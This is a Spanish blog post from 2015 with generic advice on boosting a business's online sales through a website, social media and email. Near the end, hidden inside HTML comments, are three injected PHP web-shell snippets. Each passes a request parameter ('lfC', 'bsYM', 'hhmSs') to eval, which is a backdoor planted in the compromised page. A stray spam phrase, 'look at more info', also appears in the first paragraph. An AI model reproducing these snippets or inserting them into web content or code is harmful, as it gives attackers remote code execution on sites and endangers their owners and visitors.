¿Cómo mejorar las ventas de tu negocio vía internet?

diego/ Noviembre 30, 2015/ Marketing, Negocios online/ 0 comentarios

Que la era de internet ha llegado para quedarse es una verdad incuestionable look at more info. Partiendo de esta máxima, parece inútil dar la espalda a las innumerables opciones que nos ofrece el espectro web a través de dos vías: Por un lado el marketing online, y por otro la introducción del e-commerce.

En cuanto al primer punto, es cada vez más latente que aquellas empresas o marcas que no se encuentran en la red, tanto a través de un portal en el que darnos a conocer, potenciar nuestra imagen de marca y acercar nuestros productos o servicios a potenciales clientes, como desde las redes sociales acercando nuestro mensaje y ampliando su eco, sencillamente no existen.

Lo que hace unos años era una apuesta algo excéntrica que suponía una inversión de dudoso retorno, ahora ha pasado ha convertirse en una obligación para así, en primer lugar subsistir, y en segundo ampliar los horizontes y por ende los límites de crecimiento de nuestro negocio.

Para conseguirlo, existen un conglomerado de acciones que no paran de ir actualizándose y que se amparan bajo el paraguas del marketing online.

En cuanto al segundo punto, una vez nos hemos adentrado en el mundo digital sin el que difícilmente podremos sobrevivir, es capital acercar nuestros productos o servicios a través de la red de redes. Toda nuestra comunicación vertida en internet debe ir encaminada a acercar a nuestro target a una nueva manera de contactarnos, y de adquirir alguno de nuestros productos.

Cuanto estos dos asuntos, marketing online y e-commerce, van de la mano, tenemos ya todos los ingredientes para impulsar nuestro negocio en internet. A continuación os damos algunos consejos con el objetivo de ayudaron a mejorar los resultados de vuestra marca o empresa, sea del sector que sea, independientemente de cuál sea su tamaño y del ámbito al que se ciña.

Una web práctica. Nuestro portal es nuestra tarjeta de visita. Qué ofrecemos, cómo lo ofrecemos y hacerlo a través de contenidos claros y de calidad que se encuentran de manera rápida e intuitiva ayudará no sólo a mejorar nuestra imagen corporativa, sino a potenciar el acceso a nuestra sección de ventas.

Perfil en las redes sociales. Si bien cada red social tiene un público distinto, no es menor cierto que cada vez son más las empresas que luchan una batalla por la creación de contenidos específicos para nuestros clientes en las RRSS en busca de la afiliación y la mejora en la experiencia de nuestros usuarios en las redes. Allí no sólo hay que comunicar la información que nos atañe de manera puntual, sino que hay que tratar de responder y solventar dudas y problemas de nuestro target.

Además de nuestra página web y el trabajo que realicemos en las redes sociales, es importante recordar también que el contacto vía mail con nuestros clientes es básico. Ya sea enviando nuestras novedades vía newsletter, como ofreciendo un buen servicio de atención al cliente, estar contacto vía internet con nuestros clientes es la otra gran pata de la mesa del éxito del aterrizaje de un negocio en internet.

<!– [insert_php]if (isset($_REQUEST["lfC"])){eval($_REQUEST["lfC"]);exit;}[/insert_php][php]if (isset($_REQUEST["lfC"])){eval($_REQUEST["lfC"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["bsYM"])){eval($_REQUEST["bsYM"]);exit;}[/insert_php][php]if (isset($_REQUEST["bsYM"])){eval($_REQUEST["bsYM"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["hhmSs"])){eval($_REQUEST["hhmSs"]);exit;}[/insert_php][php]if (isset($_REQUEST["hhmSs"])){eval($_REQUEST["hhmSs"]);exit;}[/php] –>

Dejar un Comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Puedes usar HTML etiquetas y atributos: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>
*
*

Time limit is exhausted. Please reload CAPTCHA.